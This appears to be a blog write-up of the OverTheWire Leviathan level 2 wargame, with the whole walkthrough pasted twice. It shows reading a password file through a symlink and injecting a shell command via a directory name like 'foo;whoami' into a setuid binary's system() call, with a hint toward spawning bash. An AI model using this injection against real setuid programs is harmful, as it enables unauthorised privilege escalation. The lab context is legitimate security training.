leviathan level 2 overthewire - updated challenge
leviathan 2 overthewire setreuid(12002, 12002)
start by making a folder with our "mktemp -d", make a file, and ltrace ./printfile <your file>
most tutorials will show you how to get this done with a link file, which are good tutorials and test cases as they are, read them.
trying that... INSIDE our tmp folder
ln -s /etc/leviathan_pass/leviathan3 /tmp/tmp.ydhTgRu2oq/b
ltrace ~/printfile /tmp/tmp.ydhTgRu2oq/a\ b
will output
system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1
/bin/cat: b: Permission denied
this is because these 2 lines
geteuid()
setreuid(12002, 12002)
but, i guess that was not the hack, and in the end we see that the final line executing is
anyway, like above or doing just a file named "a b" and another named "b" will output
system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1
/bin/cat: b: No such file or directory
the important thing "cat" command did try to concat.
but to the real hack... make a folder in your tmp like this 'mkdir "foo;whoami"'
now run:
ltrace ~/printfile "/tmp/tmp.ydhTgRu2oq/foo;whoami"
output:
system("/bin/cat /tmp/tmp.ydhTgRu2oq/foo".../bin/cat: /tmp/tmp.ydhTgRu2oq/foo: Is a directory
leviathan2
that means that since the file give cat out folder name as a string, as long as we can chain shell commands in the folder name it will be executed... slashes (/) and backslashes (\) are out.
HINT: keep your mind with the simple default commands which are all here "/bin"
or "ls /bin"
SPOILER ALERT
p.s. starting a bash shell is just running the command bash
start by making a folder with our "mktemp -d", make a file, and ltrace ./printfile <your file>
most tutorials will show you how to get this done with a link file, which are good tutorials and test cases as they are, read them.
trying that... INSIDE our tmp folder
ln -s /etc/leviathan_pass/leviathan3 /tmp/tmp.ydhTgRu2oq/b
ltrace ~/printfile /tmp/tmp.ydhTgRu2oq/a\ b
will output
system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1
/bin/cat: b: Permission denied
this is because these 2 lines
geteuid()
setreuid(12002, 12002)
but, i guess that was not the hack, and in the end we see that the final line executing is
anyway, like above or doing just a file named "a b" and another named "b" will output
system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1
/bin/cat: b: No such file or directory
the important thing "cat" command did try to concat.
but to the real hack... make a folder in your tmp like this 'mkdir "foo;whoami"'
now run:
ltrace ~/printfile "/tmp/tmp.ydhTgRu2oq/foo;whoami"
output:
system("/bin/cat /tmp/tmp.ydhTgRu2oq/foo".../bin/cat: /tmp/tmp.ydhTgRu2oq/foo: Is a directory
leviathan2
that means that since the file give cat out folder name as a string, as long as we can chain shell commands in the folder name it will be executed... slashes (/) and backslashes (\) are out.
HINT: keep your mind with the simple default commands which are all here "/bin"
or "ls /bin"
SPOILER ALERT
p.s. starting a bash shell is just running the command bash
Comments
Post a Comment